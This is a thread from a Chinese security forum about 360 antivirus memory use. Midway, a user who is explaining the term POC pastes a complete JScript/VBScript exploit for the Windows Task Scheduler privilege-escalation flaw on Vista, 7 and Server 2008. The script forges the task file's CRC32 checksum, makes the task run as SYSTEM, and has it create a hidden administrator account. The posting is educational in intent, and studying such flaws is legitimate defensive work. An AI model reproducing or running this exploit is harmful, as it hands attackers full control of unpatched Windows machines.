楼主: zjkzjy
收起左侧

[已解决] 360杀毒2.0+卫士内存使用需要那么高?(已卸载请锁帖谢谢!)

  [复制链接]
Lgwu
头像被屏蔽
发表于 2010-11-24 23:32:38 | 显示全部楼层
回复 30楼 红芽芋 的帖子

在安全行业,POC通俗的说就是漏洞利用代码。有POC,通常稍加修改或不用修改,只要编译成功,就可以直接去利用漏洞进行攻击。
红芽芋
发表于 2010-11-24 23:33:47 | 显示全部楼层
Lgwu 发表于 2010-11-24 23:32
回复 30楼 红芽芋 的帖子

在安全行业,POC通俗的说就是漏洞利用代码。有POC,通常稍加修改或不用修改,只要 ...

刚刚百科了一下
Lgwu
头像被屏蔽
发表于 2010-11-24 23:35:48 | 显示全部楼层
本帖最后由 Lgwu 于 2010-11-24 23:37 编辑

回复 32楼 红芽芋 的帖子

给你个链接,Microsoft Windows任务调度服务本地权限提升漏洞:
http://sebug.net/vulndb/20266/ 里面的影响版本和漏洞描述是漏洞相关的信息。

http://sebug.net/exploit/20263/ 里面测试方法下面的代码就是POC
红芽芋
发表于 2010-11-24 23:38:59 | 显示全部楼层
Lgwu 发表于 2010-11-24 23:35
回复 32楼 红芽芋 的帖子

给你个链接,Microsoft Windows任务调度服务本地权限提升漏洞:

谢谢老板,不过校园网不给力
Lgwu
头像被屏蔽
发表于 2010-11-24 23:41:57 | 显示全部楼层
红芽芋 发表于 2010-11-24 23:38
谢谢老板,不过校园网不给力

你真是大悲剧。

Microsoft Windows任务调度服务本地权限提升漏洞
影响版本:
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7

漏洞描述:
Windows的任务调度服务实现上存在访问验证漏洞,本地攻击者可能利用此漏洞把自身的权限提升到SYSTEM权限,从而获取系统的完全控制。
任务调度服务没能正确阻止用户通过COM接口修改XML定义文件中的某些字段,导致恶意用户操纵一个有效的XML文件并绕过CRC校验,实现以SYSTEM权限执行任意指令。


测试方法
  1. # Exploit Title: Windows Task Scheduler Privilege Escalation 0day
  2. # Date: 20-11-2010
  3. # Author: webDEViL
  4. # Tested on: Windows 7/2008 x86/x64


  5. <job id="tasksch-wD-0day">
  6. <script language="Javascript">

  7. crc_table = new Array(
  8.   0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  9.   0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  10.   0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  11.   0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  12.   0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  13.   0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  14.   0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  15.   0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  16.   0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  17.   0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  18.   0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  19.   0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  20.   0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  21.   0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  22.   0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  23.   0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  24.   0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  25.   0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  26.   0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  27.   0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  28.   0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  29.   0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  30.   0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  31.   0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  32.   0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  33.   0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  34.   0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  35.   0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  36.   0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  37.   0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  38.   0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  39.   0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  40.   0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  41.   0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  42.   0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  43.   0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  44.   0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  45.   0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  46.   0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  47.   0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  48.   0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  49.   0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  50.   0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  51.   0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  52.   0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  53.   0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  54.   0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  55.   0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  56.   0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  57.   0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  58.   0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  59.   0x2D02EF8D
  60. );

  61. var hD='0123456789ABCDEF';

  62. function dec2hex(d) {
  63. h='';
  64. for (i=0;i<8;i++) {
  65. h = hD.charAt(d&15)+h;
  66. d >>>= 4;
  67. }
  68. return h;
  69. }
  70. function encodeToHex(str){
  71.     var r="";
  72.     var e=str.length;
  73.     var c=0;
  74.     var h;
  75.     while(c<e){
  76.         h=str.charCodeAt(c++).toString(16);
  77.         while(h.length<3) h="0"+h;
  78.         r+=h;
  79.     }
  80.     return r;
  81. }
  82. function decodeFromHex(str){
  83.     var r="";
  84.     var e=str.length;
  85.     var s=0;
  86.     while(e>1){
  87.          
  88.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  89.          
  90.         s=s+2;
  91.         e=e-2;
  92.     }
  93.      
  94.     return r;
  95.      
  96. }


  97. function calc_crc(anyForm) {

  98. anyTextString=decodeFromHex(anyForm);

  99. Crc_value = 0xFFFFFFFF;
  100. StringLength=anyTextString.length;
  101. for (i=0; i<StringLength; i++) {
  102. tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
  103. Table_value = crc_table[tableIndex];
  104. Crc_value >>>= 8;
  105. Crc_value ^= Table_value;
  106. }
  107. Crc_value ^= 0xFFFFFFFF;
  108. return dec2hex(Crc_value);

  109. }

  110. function rev_crc(leadString,endString,crc32) {
  111. //
  112. // First, we calculate the CRC-32 for the initial string
  113. //
  114.     anyTextString=decodeFromHex(leadString);
  115.      
  116.    Crc_value = 0xFFFFFFFF;
  117.    StringLength=anyTextString.length;
  118.    //document.write(alert(StringLength));
  119.    for (var i=0; i<StringLength; i++) {
  120.       tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
  121.       Table_value = crc_table[tableIndex];
  122.       Crc_value >>>= 8;
  123.       Crc_value ^= Table_value;
  124.    }
  125. //
  126. // Second, we calculate the CRC-32 without the final string
  127. //
  128.    crc=parseInt(crc32,16);
  129.    crc ^= 0xFFFFFFFF;
  130.    anyTextString=decodeFromHex(endString);
  131.    StringLength=anyTextString.length;
  132.    for (var i=0; i<StringLength; i++) {
  133.       tableIndex=0;
  134.       Table_value = crc_table[tableIndex];
  135.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
  136.          tableIndex++;
  137.          Table_value = crc_table[tableIndex];
  138.       }
  139.       crc ^= Table_value;
  140.       crc <<= 8;
  141.       crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
  142.    }
  143. //
  144. // Now let's find the 4-byte string
  145. //
  146.    for (var i=0; i<4; i++) {
  147.       tableIndex=0;
  148.       Table_value = crc_table[tableIndex];
  149.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
  150.          tableIndex++;
  151.          Table_value = crc_table[tableIndex];
  152.       }
  153.       crc ^= Table_value;
  154.       crc <<= 8;
  155.       crc |= tableIndex;
  156.    }
  157.    crc ^= Crc_value;
  158. //
  159. // Finally, display the results
  160. //
  161.    var TextString=dec2hex(crc);
  162.    var Teststring='';
  163. Teststring=TextString.substring(6,8);
  164. Teststring+=TextString.substring(4,6);
  165. Teststring+=TextString.substring(2,4);
  166. Teststring+=TextString.substring(0,2);
  167.    return Teststring
  168. }
  169. function decodeFromHex(str){
  170.     var r="";
  171.     var e=str.length;
  172.     var s=0;
  173.     while(e>1){
  174.          
  175.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  176.          
  177.         s=s+2;
  178.         e=e-2;
  179.     }
  180.      
  181.     return r;
  182.      
  183. }
  184. </script>



  185. <script language="VBScript">
  186. dim output
  187. set output = wscript.stdout
  188. output.writeline " Task Scheduler 0 day - Privilege Escalation "
  189. output.writeline " Should work on Vista/Win7/2008 x86/x64"
  190. output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
  191. biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
  192. Set objShell = CreateObject("WScript.Shell")
  193. objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

  194. Set fso = CreateObject("Scripting.FileSystemObject")
  195. Set a = fso.CreateTextFile(biatchFile, True)
  196. a.WriteLine ("net user /add test123 test123")
  197. a.WriteLine ("net localgroup administrators /add test123")
  198. a.WriteLine ("schtasks /delete /f /TN wDw00t")

  199. Function ReadByteArray(strFileName)
  200. Const adTypeBinary = 1
  201. Dim bin
  202.     Set bin = CreateObject("ADODB.Stream")
  203.     bin.Type = adTypeBinary
  204.     bin.Open
  205.     bin.LoadFromFile strFileName
  206.     ReadByteArray = bin.Read
  207. 'output.writeline ReadByteArray
  208. End Function

  209. Function OctetToHexStr (arrbytOctet)
  210. Dim k
  211. OctetToHexStr = ""
  212. For k = 3 To Lenb (arrbytOctet)
  213.   OctetToHexStr = OctetToHexStr _
  214.         & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
  215. Next
  216. End Function
  217. strFileName="C:\windows\system32\tasks\wDw00t"

  218. hexXML = OctetToHexStr (ReadByteArray(strFileName))
  219. 'output.writeline hexXML
  220. crc32 = calc_crc(hexXML)
  221. output.writeline "Crc32 Original: "+crc32


  222. Set xmlDoc = CreateObject("Microsoft.XMLDOM")
  223. 'permissions workaround
  224. 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
  225. 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
  226. Set objShell = WScript.CreateObject("WScript.Shell")
  227. Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

  228. Do Until objExecObject.StdOut.AtEndOfStream
  229. strLine = strLine & objExecObject.StdOut.ReadLine()
  230. Loop
  231. hexXML = "FFFE3C00"+OctetToHexStr(strLine)
  232. 'output.writeline hexXML
  233. Set ts = fso.createtextfile ("wDw00t.xml")
  234. For n = 1 To (Len (hexXML) - 1) step 2
  235. ts.write Chr ("&h" & Mid (hexXML, n, 2))
  236. Next
  237. ts.close

  238. xmlDoc.load "wDw00t.xml"
  239. Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
  240. Author.text = "LocalSystem"
  241. Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
  242. UserId.text = "S-1-5-18"
  243. xmldoc.save(strFileName)

  244. hexXML = OctetToHexStr (ReadByteArray(strFileName))

  245. leadString=hexXML+"3C0021002D002D00"
  246. endString="2D002D003E00"
  247. 'output.writeline leadString
  248. impbytes=rev_crc(leadString,endString,crc32)
  249. output.writeline "Crc32 Magic Bytes: "+impbytes

  250. finalString = leadString+impbytes+endString
  251. forge = calc_crc(finalString)
  252. output.writeline "Crc32 Forged: "+forge

  253. strHexString="FFFE"+finalString
  254. Set fso = CreateObject ("scripting.filesystemobject")
  255. Set stream = CreateObject ("adodb.stream")

  256. Set ts = fso.createtextfile (strFileName)

  257. For n = 1 To (Len (strHexString) - 1) step 2
  258. ts.write Chr ("&h" & Mid (strHexString, n, 2))
  259. Next
  260. ts.close


  261. Set objShell = CreateObject("WScript.Shell")
  262. objShell.Run "schtasks /change /TN wDw00t /disable",,True
  263. objShell.Run "schtasks /change /TN wDw00t /enable",,True
  264. objShell.Run "schtasks /run /TN wDw00t",,True

  265. </script>
  266. </job>
复制代码
zjkzjy
 楼主| 发表于 2010-11-24 23:42:29 | 显示全部楼层
回复 21楼 windfreedom 的帖子

额…360杀毒一开机就显示内存使用20%以上,确实感觉很差异。
skyl47129
发表于 2010-11-24 23:43:22 | 显示全部楼层
三套装+opera+Q,毫无鸭梨

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
红芽芋
发表于 2010-11-24 23:46:58 | 显示全部楼层
Lgwu 发表于 2010-11-24 23:41
你真是大悲剧。
# Tested on: Windows 7/2008 x86/x64


我是XP的系统
Lgwu
头像被屏蔽
发表于 2010-11-24 23:50:16 | 显示全部楼层
回复 36楼 zjkzjy 的帖子

360杀毒显示的占用并非全部是自身,其它进程和服务等占用都算在里面。
你看看任务管理器里面,具体是什么占用系统资源不就知道了?
Lgwu
头像被屏蔽
发表于 2010-11-24 23:51:41 | 显示全部楼层
回复 38楼 红芽芋 的帖子

我也是XP,并且系统资源也不让我去虚拟win7这些系统,所以最近才无聊了点。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 18:46 , Processed in 0.128962 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表